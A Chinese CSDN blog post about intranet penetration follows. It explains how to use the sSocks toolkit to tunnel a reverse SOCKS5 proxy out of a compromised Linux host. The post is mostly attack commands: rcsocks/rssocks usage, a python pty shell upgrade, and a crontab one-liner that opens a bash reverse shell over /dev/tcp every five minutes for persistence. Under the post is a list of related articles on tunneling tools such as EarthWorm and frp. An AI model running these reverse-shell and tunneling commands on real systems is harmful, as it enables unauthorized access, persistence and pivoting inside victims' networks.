[ssocks] 内网 socks 代理

最新推荐文章于 2023-07-30 11:11:04 发布
最新推荐文章于 2023-07-30 11:11:04 发布
阅读量3.2k 收藏 4
点赞数
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33020901/article/details/84823122
版权

emmm。有了一台 linux 计划任务反弹的shell,socks 搞内网 ~

 

使用方法 就跟 rcsocks 的 help 一样, rsscoks 在target上运行,rcsocks 在 hacker 上运行 // 我用 use 标出来了

[root@target src]# ./rcsocks -h
./rcsocks -h
rcSocks Reverse Client Socks5 v0.0.14
Usage:
	./rcsocks -p 1088 -l 1080 -b // use 
	./rcsocks -p 1088 -l 1080
In this config you run rssocks like this:
rssocks --socks rcsocksserv:1080     // use
and set your tool to connect trought the [socks5 server rcsocksserv:1088] // use

对于 ssocksd 使用场景,我觉得是,直接外部可访问有独立IP,直接开个端口就OK,没实际测试

./src/ssocksd -b 127.0.0.1 --port 1080
./src/ssocksd -b 127.0.0.1 --port 1080 --daemon &
python -c 'import pty;pty.spawn("/bin/sh")'

问了下师傅,nc 反弹过来的 转成 pty 能交互很爽

echo "*/5 * * * * bash -i >& /dev/tcp/127.0.0.1/6666 0>&1" > conf && crontab conf && rm -f conf

一行写成 计划任务

 

Linux的需要先进行编译:./configure make

[下载地址] http://sourceforge.net/projects/ssocks/

PD_3569
关注
专栏目录
Ssocks 隧道
战神/calmness的博客
11-12 729
目录 描述 过程 程序功能 帮助 环境模拟 描述 sSocks是一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试。 过程 说明一下——攻击端和受害端都得安装ssocks,否则无法遥相呼应 https://sourceforge.net/projects/ssocks/ 解压编译 root@kali...
内网安全——域横向内网漫游Socks代理隧道技术
世间繁华梦一出
08-06 569
内网漫游——内网穿透Socks代理技术内网穿透Ngrok测试演示——两个内网通讯上线内网穿透Frp自建跳板测试——两个内网通讯上线CFS三层内网漫游安全测试演练——某CTF线下2019 内网穿透Ngrok测试演示——两个内网通讯上线 Ngrok代理工具的作用就是(如下图)在两个不同内网的主机之间的外网提供一台服务器, 内网穿透Frp自建跳板测试——两个内网通讯上线 CFS三层内网漫游安全测试演练——某CTF线下2019 ...
ssocks 反弹socks代理
01-15
ssocks 合集反弹socks代理,用于内网管理。
利用ssocks进行内网穿透
课嗨教育的专栏
10-06 1295
目录 主机的操作 ssocks转发的其他操作 sSocks是一个socks代理工具套装,可用来开启socks代理服务,支持socks5验证,支持IPV6和UDP,并提供反向socks代理服务,即将远程计算机作为socks代理服务端,反弹回本地,极大方便内网的渗透测试,而proxychains代理链是Linux下一款代理设置工具。由于Ssocks不稳定,所以不建议使用。 现在有这么一个环境,我们获取到了位于公网Web服务器的shell,该web服务器是Linux系统,内网中存在另外一台主机,这里假设内.
内网安全-代理Socks协议&CS-MSF控制上线
m0_65336233的博客
12-19 1919
内网安全-代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线
内网安全:代理技术详解
qq_61553520的博客
06-03 9153
本篇将介绍在内网攻防中经常用到的代理技术,正向连接,反向连接。
Pystinger实现内网主机CS上线
痴人说梦梦中人
03-29 4765
Pystinger实现内网主机CS上线一、Pystinger简介二、原理分析三、操作演示 一、Pystinger简介         毒刺(pystinger)通过webshell实现内网SOCK4代理,端口映射。可直接用于metasploit-framework,viper,cobalt strike上线,主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本。 repo:https://github.c
内网通道构建——socks
SheXinK’s Blog
12-23 1071
内网通道构建——socks篇1、 测试环境2、 内网通道构建2.1、SSF2.2、EW2.3、SSOCKS2.4、XSOCKS 1、 测试环境   攻击机:192.168.11.137   Target1:192.168.11.151 192.168.21.101   Target2:192.168.21.102   假如拿到了Target1的shell,需通过Target1构建通道,访问Targ...
隐藏隧道通信:Socks 隧道
f_carey的博客
09-03 1933
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 内网安全之:Socks 隧道1 Socks 隧道原理2 实验环境2.1 客户端配置2.2 服务端配置2.3 利用 Socks 隧道代理扫描内网主机 1 Socks 隧道原理 socks 是一种代理服务,可以说是一个升级版的 lcx。 Sockssocks 4 和 socks 5 两种类型,socks 4 .
git下载编译proxychains实现socks代理使用
shile的专栏
04-25 4093
git下载编译proxychains实现socks代理使用1. 使用git下载和编译yum -y install git gcc cd /opt git clone https://github.com/haad/proxychains cd proxychains ./configure make sudo make install sudo cp src/proxychains.conf
EarthWorm 内网穿透神器
01-18
EarthWorm是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。相较于其他穿透工具,如reGeorg等, EarthWorm可以穿透更复杂的内网环境同时也不需要跳板机运行web服务,也可以支持多平台间的转接通讯,如Linux、Windows、MacOS、Arm-Linux等。
EarthWorm-20180630.zip
08-05
EW 是一套便携式的网络穿透工具,具有 SOCKS5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS等
Socks代理反弹突破内网(freebuf)
cnbird's blog
09-02 4392
随着信息安全意识的提升,越来越多的信息系统前端均部署有防火墙,系统管理员根据业务需求将内部必要的服务端口通过端口映射等手段映射到公网中,如默认web服务端口80、MSSQL数据库服务端口1433等。通过部署防火墙可以将信息系统内部区域与公网逻辑隔离开来,利用相关的策略有效避免或减轻来自外部的攻击。 对于渗透测试者来说,如何绕过防火墙的阻挡在内网展开渗透测试成为亟需解决的问题,本文介绍了在夺取映射
Socks代理反弹突破内网
不懂
09-19 992
随着信息安全意识的提升,越来越多的信息系统前端均部署有防火墙,系统管理员根据业务需求将内部必要的服务端口通过端口映射等手段映射到公网中,如默认web服务端口80、MSSQL数据库服务端口1433等。通过部署防火墙可以将信息系统内部区域与公网逻辑隔离开来,利用相关的策略有效避免或减轻来自外部的攻击。对于渗透测试者来说,如何绕过防火墙的阻挡在内网展开渗透测试成为亟需解决的问题,本文介绍了在夺取映射到...
内网端口转发及穿透
热门推荐
jsd2root的博客
03-07 2万+
最近尝试了一些内网端口的转发和内网穿透,现在一起总结一下。 0x01 正向和反向代理 正向代理中,proxy 和 client 同属一个 LAN,对 server 透明; 反向代理中,proxy 和 server 同属一个 LAN,对 client 透明。 实际上 proxy 在两种代理中做的事都是代为收发请求和响应,不过从结构上来看正好左右互换了下,所以把前者那种代理方式叫做正向代理,后...
socks代理实战
weixin_43873557的博客
02-08 1万+
文章目录Socks代理实战Socks代理简介Socks代理工具Socks代理实战-MSF渗透场景Target1Target2Target3Socks代理实战-FRPTarget1Target2Target3Socks代理实战-EWEW使用简介EW正反向Socks代理EW创建一层Socks代理二级级联本地SocksEW创建二层Socks代理三级级联的本地SocksEW创建三层Socks代理 Socks代理实战 Socks代理简介 什么是socks SOCKS是一种网络传输协议,主要用于客户端与外网服务器之
内网入口——代理搭建&端口转发
Captain_RB的博客
12-19 1万+
内网渗透过程中经常会遇到搭建代理和端口转发的情况,本文记录一些常用工具的使用方法和典型应用场景,便于查阅。
earthworm四步走(解决拨入VPN后使用burp无法抓包的问题)
kk的博客
07-30 902
三、执行命令:ew_for_Win.exe -s ssocksd -l 8888。四、设置burp上游代理
frp socks5代理 内网渗透
最新发布
10-18
frp是一款高性能的反向代理工具,可以将内网服务映射到公网上,从而实现内网穿透。而socks5代理是一种网络协议,可以实现TCP、UDP等协议的代理转发。结合使用frp和socks5代理,可以实现内网渗透的目的。 具体实现方法如下: 1. 在公网服务器上安装frp,并配置好反向代理规则。 2.*** 在攻击机上使用socks5代理客户端连接内网机器的socks5代理服务,即可访问内网服务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值